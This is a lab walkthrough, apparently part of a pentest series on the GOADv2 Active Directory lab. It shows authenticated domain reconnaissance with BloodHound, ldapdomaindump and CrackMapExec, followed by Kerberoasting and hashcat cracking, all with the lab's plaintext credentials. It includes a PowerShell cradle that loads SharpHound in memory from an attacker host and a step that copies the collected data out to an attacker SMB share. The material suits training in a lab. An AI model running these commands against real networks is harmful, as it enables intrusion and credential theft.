Skip to content

2

Enumeration with a User

Domain Recon

Now that we have some valid credentials, we can really start to enumerate the target domains.

GetADUsers.py

impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
impacket-getadusers

ldapdomaindump

We can also use ldap querys to gather information on all of the other domains due to forest trust relationships. An excellent tool for this is ldapdomaindump which exports the results into grepable, json and html formats for quick data parsing. 

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10.12 --outdir ldapdomaindump-essos

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10 --outdir ldapdomaindump-sevenkingdoms

ldapdomaindump --user 'north.sevenkingdoms.local\brandon.stark' --password 'iseedeadpeople' 192.168.10.11 --outdir ldapdomaindump-north.sevenkingdoms
ldapdomaindump-essos

BloodHound Collection

With a credential we should always run BloodHound if possible to help us formulate attack paths and find misconfigurations. 

python bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -ns 192.168.10.11
bloodhound-north

We have to change our command syntax up a bit, in order to enumerate the other domains. 

python bloodhound.py --zip -c All -d essos.local -u samwell.tarly@north.sevenkingdoms.local -p Heartsbane -dc meereen.essos.local -ns 192.168.10.12
bloodhound-essos 
python bloodhound.py --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.10.10
bloodhound-sevenkingdoms

The brandon.stark user has rdp access to castelblack, so lets rdp in and run the SharpHound.exe as it is more robust than the python bloodhound port.

We can spin up an smb share in order to transfer the executable over to the target machine. 

impacket-smbserver share $(pwd) -username me -password me -smb2support
impacket-smbserver

net use \\10.10.10.10\share\SharpHound.exe C:\Windows\Tasks\SharpHound.exe
echo F | xcopy \\10.10.10.10\share\SharpHound.exe C:\Windows\Tasks\SharpHound.exe
transfer-file

If we wanted to run the assembly entirely in memory instead of writing to disc we could do the following. 

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())

Now we can run the collector for all three domains. 

.\SharpHound.exe -d north.sevenkingdoms.local -c all --zipfilename winbh-north-sevenkingdoms.zip

.\SharpHound.exe -d sevenkingdoms.local -c all --zipfilename winbh-sevenkingdoms.zip

.\SharpHound.exe -d essos.local -c all --zipfilename winbh-essos.zip
windows-bloodhound-collection

Then we can pull the zip files off of the server and back to our attacker machine for analysis. 

echo F | xcopy .\20230623045149_winbh-north-sevenkingdoms.zip \\10.10.10.10\share
file-transfer-of-data

We should have a ton of intel to import into BloodHound at this point! bloodhound-zips

All domains and computers
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
all-domains-and-computers

All the Domain Users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
all-users

Map of Domains/Groups/Users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
map-of-domains-groups-users

ACLs for the Users
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
bh-acls

Share Enumeration

With a valid account we can utilize tooling such as CrackMapExec to see what that user has access to in regards to network shares. There isn't anything juicy in the GOADv2 shares, however during a real engagement tools like manspider & snaffler are incredibly useful to find all sorts of juicy things.

Share Enumeration with CME
crackmapexec smb 192.168.10.10-23 -u 'brandon.stark' -p 'iseedeadpeople' --shares
cme-shares

Kerberoasting

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service. Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials https://attack.mitre.org/techniques/T1558/003/

kerberoasting with impacket
impacket-GetUserSPNs -request -dc-ip 192.168.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
GetUserSPNs kerberoasting.hashes

Now we can try to crack the SPNs with hashcat 

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
We were successful in obtaining another credential! jon.snow-password

north.sevenkingdoms.local\jon.snow:iknownothing❗

Next: Relay Attacks